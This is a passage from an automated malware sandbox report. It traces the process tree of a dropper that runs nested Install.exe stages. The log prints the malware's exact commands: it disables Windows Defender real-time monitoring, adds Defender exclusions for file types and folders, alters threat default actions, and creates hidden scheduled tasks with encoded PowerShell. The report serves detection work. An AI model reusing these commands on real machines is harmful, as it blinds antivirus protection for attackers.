SeSystemtimePrivilege 2968 WMIC.exe Token: SeBackupPrivilege 2968 WMIC.exe Token: SeRestorePrivilege 2968 WMIC.exe Token: SeShutdownPrivilege 2968 WMIC.exe Token: SeSystemEnvironmentPrivilege 2968 WMIC.exe Token: SeUndockPrivilege 2968 WMIC.exe Token: SeManageVolumePrivilege 2968 WMIC.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2104 WMIC.exe Token: SeIncreaseQuotaPrivilege 2104 WMIC.exe Token: SeSecurityPrivilege 2104 WMIC.exe Token: SeTakeOwnershipPrivilege 2104 WMIC.exe Token: SeLoadDriverPrivilege 2104 WMIC.exe Token: SeSystemtimePrivilege 2104 WMIC.exe Token: SeBackupPrivilege 2104 WMIC.exe Token: SeRestorePrivilege 2104 WMIC.exe Token: SeShutdownPrivilege 2104 WMIC.exe Token: SeSystemEnvironmentPrivilege 2104 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 
33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2576 wrote to memory of 3060 2576 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe.\Install.exe /KZqjdidXaW "385121" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2624
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2524
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:3060
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2548
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2592
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2676
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2620
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2384
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2976
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2528
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2424
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:2340
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:1924
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe\" PP /NvFdidEBmy 385121 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1976
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"4⤵PID:1928
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn btZaCbGShXZoJDfvCg5⤵PID:1948
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn btZaCbGShXZoJDfvCg6⤵PID:1080
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 6044⤵
- Program crash
PID:2604
C:\Windows\system32\taskeng.exetaskeng.exe {6CFBFD9D-0CBB-4AF8-BC87-646F11C8566F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:804
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exeC:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe PP /NvFdidEBmy 385121 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:876
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1332
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2248
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1992
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:936
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2076
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2224
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2088
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2220
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1208
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2228
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:472
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2720
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:584
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:516
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2244
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHrmjaccM" /SC once /ST 00:36:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2916
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHrmjaccM"3⤵PID:1964
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHrmjaccM"3⤵PID:1824
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:880
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2004
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1140
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1600
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxkbdyaVa" /SC once /ST 00:20:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2856
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxkbdyaVa"3⤵PID:3012
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxkbdyaVa"3⤵PID:2324
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2532
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2488
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2792
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2664
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1620
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:1632
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1816
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2140
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:2312
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:1568
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2412
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf"3⤵PID:2784
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf"3⤵
- Modifies data under HKEY_USERS
PID:948 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1652
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:540
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2092
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2248
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2096
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2724
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2156
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2200
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:516
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1488
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3052
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1788
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1964
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:700
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1084
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1096
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1548
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3040
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵PID:2876
